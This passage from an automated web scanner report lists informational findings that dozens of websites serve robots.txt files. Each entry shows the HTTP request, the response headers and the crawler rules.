Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.getours.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:27:21 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Thu, 07 Jan 2010 19:41:49 GMT
ETag: "19d5d5-48-47c9843127940"
Accept-Ranges: bytes
Content-Length: 72
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /_CMS/
Disallow: /php/

sitemap: sitemap.xml.gz

27.685. http://www.gettraf.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gettraf.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gettraf.org

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 01:32:26 GMT
Content-Type: text/plain
Content-Length: 46
Last-Modified: Sat, 08 May 2010 17:41:51 GMT
Connection: close
Accept-Ranges: bytes

Host: gettraf.org
User-Agent: *
Allow: /


27.686. http://www.ghinclub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ghinclub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ghinclub.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:00:46 GMT
Content-Type: text/plain
Content-Length: 88
Last-Modified: Thu, 21 Apr 2011 12:25:02 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /_css/
Disallow: /_js/
Disallow: /images/
Disallow: /_rtimages/

27.687. http://www.ghostresearch.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ghostresearch.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ghostresearch.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:21:10 GMT
Server: Apache
Last-Modified: Fri, 08 Apr 2011 04:50:26 GMT
ETag: "f14067-131-4a060f6dfa880"
Accept-Ranges: bytes
Content-Length: 305
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow:
...[SNIP]...

27.688. http://www.ghostvillage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ghostvillage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ghostvillage.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:15:58 GMT
Server: Apache
Last-Modified: Fri, 21 Jan 2011 15:00:24 GMT
Accept-Ranges: bytes
Content-Length: 161
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /attachments
Disallow: /pics
Disallow: /webstats
Mediapartners-Google*
Disallow:

sitemap: http://cdn.attracta.com/sitemap/512821.xml.gz

27.689. http://www.ghs.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ghs.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ghs.org

Response

HTTP/1.1 200 OK
Content-Length: 51
Content-Type: text/plain
Last-Modified: Fri, 25 Sep 2009 13:55:47 GMT
Accept-Ranges: bytes
ETag: "34a711e2e73dca1:a179"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:59:03 GMT
Connection: close

User-agent: *
Disallow: /Admin/
Disallow: /admin/

27.690. http://www.giantrelease.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.giantrelease.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.giantrelease.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 24 Feb 2011 17:51:42 GMT
Accept-Ranges: bytes
ETag: "0cb7d7e4bd4cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:06:52 GMT
Connection: close
Content-Length: 147

# Dont allow search engines to index specific folder
User-agent: *
Sitemap: /sitemap.aspx
Disallow: /stats
Disallow: /members
Disallow: /admin

27.691. http://www.gifsoup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gifsoup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gifsoup.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:10:45 GMT
Content-Type: text/plain
Content-Length: 94
Last-Modified: Thu, 17 Mar 2011 05:54:11 GMT
Connection: close
Expires: Fri, 03 Jun 2011 03:10:45 GMT
Cache-Control: max-age=2592000
Cache-Control: public
Accept-Ranges: bytes

User-agent: *
Allow: /
Disallow: /gallery/adult-gifs-56
Disallow: /gallery/sexy-gifs-46


27.692. http://www.gigabitdownloads.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gigabitdownloads.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gigabitdownloads.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:53 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Fri, 29 Oct 2010 14:49:20 GMT
ETag: "ad8bf3-18-493c290419c00"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

user-agent: *
disallow:

27.693. http://www.girlfriendvideos.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.girlfriendvideos.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.girlfriendvideos.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.34
Date: Wed, 04 May 2011 01:09:01 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Wed, 04 Jun 2008 11:42:04 GMT
ETag: "1ee0001-24-44ed5b7b5fb00"
Accept-Ranges: bytes
Content-Length: 36

User-agent: ia_archiver
Disallow: /

27.694. http://www.girlslife.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.girlslife.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.girlslife.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:05:50 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Fri, 07 Nov 2008 16:15:34 GMT
Accept-Ranges: bytes
ETag: "097eaff440c91:0"
X-Powered-By: ASP.NET
Content-Length: 96

User-Agent: *
Disallow: /admin/
Disallow: /ResetPassword.aspx
Allow: /
Disallow: /Login.aspx

27.695. http://www.giveawayscout.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.giveawayscout.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.giveawayscout.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:21:30 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Last-Modified: Thu, 20 Jan 2011 06:22:48 GMT
ETag: "8e58010-49-4d37d4b8"
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /manager/
Disallow: /tasks/
Disallow: /system/

27.696. http://www.givemefile.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.givemefile.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.givemefile.net

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:25:19 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Thu, 16 Apr 2009 06:01:31 GMT
ETag: "61ca4d-24-cba9a4c0"
Accept-Ranges: bytes
Content-Length: 36

User-Agent: *
Disallow: /printnews/

27.697. http://www.glambamm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.glambamm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.glambamm.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 22 Feb 2011 13:45:38 GMT
Accept-Ranges: bytes
Content-Length: 1278
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

# Robots.txt file
#
# All robots will spider the domain

User-agent: Googlebot
Disallow: /*?*
Disallow: /*?
Disallow: /*.php$
Disallow: /*.js$
Disallow: /*.inc$
Disallow: /*.css$
Disallow: /*.wmv$

...[SNIP]...

27.698. http://www.glassesusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.glassesusa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.glassesusa.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:54:23 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "ee-4dbd512a-0"
Last-Modified: Sun, 01 May 2011 12:25:14 GMT
Content-Type: text/plain
Content-Length: 238
Vary: User-Agent
Cache-Control: max-age=300
Expires: Wed, 04 May 2011 01:59:23 GMT

User-agent: Googlebot
Disallow: /*?SID=*
Disallow: /*order=*
Disallow: /*mode=*
Disallow: /*dir=*
Disallow: /*limit=*
Disallow: /home*

User-agent: *
Disallow: /lp/*
Disallow: /ldradmin/
Disallow: /de
...[SNIP]...

27.699. http://www.glittergraphicsnow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.glittergraphicsnow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.glittergraphicsnow.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 04 May 2011 01:18:48 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Fri, 30 Jan 2009 09:41:38 GMT
ETag: "462462-10d-4982cb52"
Accept-Ranges: bytes
Content-Length: 269

User-agent: *
Disallow: /*print
Disallow: /autobackup.php
Disallow: /admin.php
Disallow: /user/
Disallow: /favorites/
Disallow: /index.php?do=register
Disallow: /?do=lastcomments
Disallow: /st
...[SNIP]...

27.700. http://www.globaltimes.cn/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.globaltimes.cn
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.globaltimes.cn

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 04 May 2011 01:40:09 GMT
Content-Type: text/plain
Content-Length: 251
Last-Modified: Wed, 02 Mar 2011 06:36:28 GMT
Connection: close
Accept-Ranges: bytes

#
# robots.txt for VeryCMS <PHPWind>
# Version 3.x
#

User-agent: *
Disallow: /admin/
Disallow: /require/
Disallow: /attachment/
Disallow: /images/
Disallow: /data/
Disallow: /template/
Di
...[SNIP]...

27.701. http://www.globalvoicesonline.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.globalvoicesonline.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.globalvoicesonline.org

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:02:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
Vary: Cookie
X-Pingback: http://globalvoicesonline.org/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.702. http://www.gm.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gm.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gm.ca

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 745
Content-Type: text/plain
Cache-Control: public,max-age=3600
Last-Modified: Thu, 15 Jul 2010 19:38:21 GMT
ETag: "2e9-4c3f63ad"
Accept-Ranges: bytes
Date: Wed, 04 May 2011 00:45:45 GMT
Connection: close

User-agent: *
Disallow:/corporate/help/legal
Disallow:/corporate/help/privacy/overview
Disallow:/corporate/help/privacy/overview
Disallow:/corporate/help/privacy/insurance
Disallow:/corporate/hel
...[SNIP]...

27.703. http://www.gnosis.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnosis.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gnosis.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:19:00 GMT
Server: Apache
Last-Modified: Thu, 20 Nov 2008 02:45:51 GMT
ETag: "3f12270-c9-4924cf5f"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /temp/
Disallow: /webalizer/
Disallow: /modlogan/

User-agent: Googlebot-Image
Disallow: /

User-agent: BecomeBot
Disallow: /

User-agent: Yeti
Disallow:
...[SNIP]...

27.704. http://www.go-arizona.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.go-arizona.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.go-arizona.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:48:14 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/1.0.0a JRun/4.0
Set-Cookie: CFID=11290026;expires=Fri, 26-Apr-2041 01:48:14 GMT;path=/
Set-Cookie: CFTOKEN=82560243;expires=Fri, 26-Apr-2041 01:48:14 GMT;path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain


User-agent: *
Disallow:/js/
Disallow:/shared/
Disallow:/modules/
Disallow:/search/
Disallow:/click.cfm?/
Sitemap: http://www.go-arizona.com/sitemaps/AZ.xml


27.705. http://www.go-get-guys.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.go-get-guys.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.go-get-guys.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:14:27 GMT
Server: Apache
Last-Modified: Mon, 19 Apr 2010 18:31:42 GMT
ETag: "20807ae-7a-4849b2c20ff80"
Accept-Ranges: bytes
Content-Length: 122
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /bannermaker/
Disallow: /cgi-bin/
Disallow: /cbscroller/
Disallow: /ufa/
Disallow: /link-checker/

27.706. http://www.goac.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goac.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goac.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2086112
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 02:10:15 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0577
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: goac.com
X-TNCMS-Served-By: cmsapp16
Content-Length: 1673

User-agent: MSNBot
Crawl-delay: 3
Disallow: /content/tncms/live/
Disallow: /content/tncms/ads/
Disallow: /search/?
Disallow: /*?mode=print
Disallow: /*?print
Disallow: /*?mode=story
Disallow:
...[SNIP]...

27.707. http://www.gocollege.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gocollege.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gocollege.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:18:47 GMT
Server: Apache/2.2.17
Last-Modified: Sun, 16 Aug 2009 02:35:55 GMT
ETag: "23-471392504f8c0"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

27.708. http://www.gog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gog.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gog.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 04 May 2011 04:15:07 GMT
Content-Type: text/plain
Content-Length: 50
Last-Modified: Tue, 11 Jan 2011 15:47:50 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow: /upload/
Disallow: /www/

27.709. http://www.goldenstateofmind.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goldenstateofmind.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goldenstateofmind.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:05:15 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Tue, 15 Mar 2011 11:45:38 GMT
ETag: "8281b-d0-49e83f79b6018"
Accept-Ranges: bytes
Content-Length: 208
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /admin
Disallow: /newfanshot
Disallow: /search
Disallow: /account
Disallow:
...[SNIP]...

27.710. http://www.goldshowertwinks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goldshowertwinks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goldshowertwinks.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:36:18 GMT
Server: Apache
Last-Modified: Tue, 29 Dec 2009 13:05:34 GMT
ETag: "9b76038-e3-47bddad666380"
Accept-Ranges: bytes
Content-Length: 227
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_test_/
Disallow: /banners/
Disallow: /cgi-bin/
Disallow: /fDyzQMK9BwX5ncr9NSVilxxfXSOpRDF/
Disallow: /ic/
Disallow: /images/
Disallow: /img/
Disallow: /members/
Disa
...[SNIP]...

27.711. http://www.golfrewind.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.golfrewind.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.golfrewind.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:20:24 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.10 mod_fastcgi/2.4.6
Last-Modified: Sat, 19 May 2007 10:57:09 GMT
ETag: "d9129f-488-430d08fb24b40"
Accept-Ranges: bytes
Content-Length: 1160
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /tags/
Disallow: /cgi-bin/
Disallow: /clientscript/
Disallow: /includes/
Disallow: /install/
Disallow: /archive/
Disallow: /customavatars/
Disallow: /printthread.php
Disallow:
...[SNIP]...

27.712. http://www.goltv.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goltv.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goltv.tv

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:52:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 20 Aug 2010 16:20:10 GMT
ETag: "11abef4-1b-48e43ac35c280"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


27.713. http://www.gonomad.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gonomad.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gonomad.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:40:28 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 22 Jan 2010 21:43:59 GMT
ETag: "404202-eb-b79805c0"
Accept-Ranges: bytes
Content-Length: 235
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /subdomain/
Disallow: /sitesearch/
Disallow: /mailstudio/
Disallow: /mwp/
Disallow: /exec/
Disallow: /Connections/
Disallow: /exec/
Disallow: /Library/
Disa
...[SNIP]...

27.714. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Wed, 04 May 2011 00:45:13 GMT
Expires: Wed, 04 May 2011 00:45:13 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

27.715. http://www.google.fm/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.fm
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.fm

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Wed, 04 May 2011 01:27:00 GMT
Expires: Wed, 04 May 2011 01:27:00 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.716. http://www.google.no/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.no
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.no

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Wed, 04 May 2011 01:33:56 GMT
Expires: Wed, 04 May 2011 01:33:56 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.717. http://www.google.ro/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.ro
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.ro

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Wed, 04 May 2011 02:55:04 GMT
Expires: Wed, 04 May 2011 02:55:04 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.718. http://www.googleadservices.com/pagead/conversion/1034849195/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1034849195/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Wed, 04 May 2011 01:12:32 GMT
Expires: Wed, 04 May 2011 01:12:32 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.719. http://www.goomradio.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goomradio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goomradio.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:47:48 GMT
Server: Apache
Last-Modified: Wed, 13 Apr 2011 09:55:03 GMT
Accept-Ranges: bytes
Content-Length: 171
Cache-Control: max-age=61
Expires: Wed, 04 May 2011 00:48:49 GMT
Vary: Accept-Encoding
X-served-by: goom-cdn03
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.goomradio.us/sitemaps.xml
Sitemap: http://www.goomradio.fr/sitemaps.xml
Disallow: /radios/find
Disallow: /shows/find
Disallow: /radio/tag

27.720. http://www.gouv.qc.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gouv.qc.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gouv.qc.ca

Response

HTTP/1.1 200 OK
accept-ranges: bytes
connection: close
content-length: 957
content-type: text/plain
date: Wed, 04 May 2011 02:14:14 GMT
etag: "54adf-3bd-f7735940"
last-modified: Tue, 03 May 2011 13:17:49 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

# commun
User-agent: *
Sitemap: http://www.gouv.qc.ca/sitemap.xml
Disallow: /portail/quebec/!ut/
Disallow: /portail/wcm/
Disallow: /portail/quebec/outils/
Disallow: /portail/quebec/pgs/citoyens/en3cli
...[SNIP]...

27.721. http://www.govermentassistance.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.govermentassistance.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.govermentassistance.info

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:06:38 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
X-Pingback: http://govermentassistance.info/xmlrpc.php
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /

27.722. http://www.govst.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.govst.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.govst.edu

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 07 Oct 2009 20:38:05 GMT
Accept-Ranges: bytes
ETag: "e4e760128e47ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:02:41 GMT
Connection: close
Content-Length: 25

User-agent: *
Allow: /

27.723. http://www.gowfb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gowfb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gowfb.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:47:25 GMT
Server: Apache
Last-Modified: Sat, 12 Dec 2009 21:29:41 GMT
ETag: "2a82320-55-4b240b45"
Accept-Ranges: bytes
Content-Length: 85
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /test/

Disallow: /admin/

Disallow: /images/u_image_backup/

27.724. http://www.gradtoday.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gradtoday.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gradtoday.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Content-Location: http://www.gradtoday.com/robots.txt
